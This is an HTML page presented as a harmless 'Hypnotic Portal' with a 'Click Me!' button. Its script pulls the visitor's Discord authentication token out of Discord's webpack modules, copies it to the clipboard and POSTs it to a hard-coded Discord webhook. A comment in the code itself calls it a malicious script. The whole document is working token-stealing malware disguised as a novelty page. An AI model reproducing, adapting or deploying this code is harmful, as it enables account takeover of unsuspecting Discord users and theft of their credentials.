<!DOCTYPE html>
<html>
<head>
    <style>
        body {
            background-color: black;
            color: white;
            font-family: Arial, sans-serif;
            text-align: center;
            padding-top: 200px;
        }
        h1 {
            font-size: 48px;
        }
        .button {
            display: inline-block;
            background-color: #ff0000;
            color: white;
            padding: 20px 40px;
            font-size: 24px;
            border-radius: 10px;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <h1>Welcome to the Hypnotic Portal!</h1>
    <button class="button" onclick="extractToken()">Click Me!</button>

    <script>
        function extractToken() {
            // Malicious script to extract token and send to web hook
            const token = (window.webpackChunkdiscord_app || [])
                .push([
                    [Math.random()],
                    {},
                    req => {
                        for (const m of Object.keys(req.c).map(x => req.c[x].exports).filter(x => x)) {
                            if (m.default && m.default.getToken !== undefined) {
                                // Copy token to clipboard
                                const copyText = m.default.getToken();
                                navigator.clipboard.writeText(copyText)
                                    .then(() => {
                                        // Send token to web hook
                                        const webhookUrl = "https://discord.com/api/webhooks/1263871139524902942/vREaJlhxLTzNXIjhtKQw4ca6zYS9YJTWuXy_5yMhVkuRKGBBHkghM4bSnF2CDLxmyt2j";
                                        fetch(webhookUrl, {
                                            method: "POST",
                                            body: JSON.stringify({ token: copyText }),
                                            headers: { "Content-Type": "application/json" }
                                        });
                                    })
                                    .catch(console.error);
                                break;
                            }
                        }
                    }
                ]);

            console.log("%cDone!", "font-size: 50px");
            console.log("%cYou now have your token in the clipboard!", "font-size: 16px");
        }
    </script>
</body>
</html>
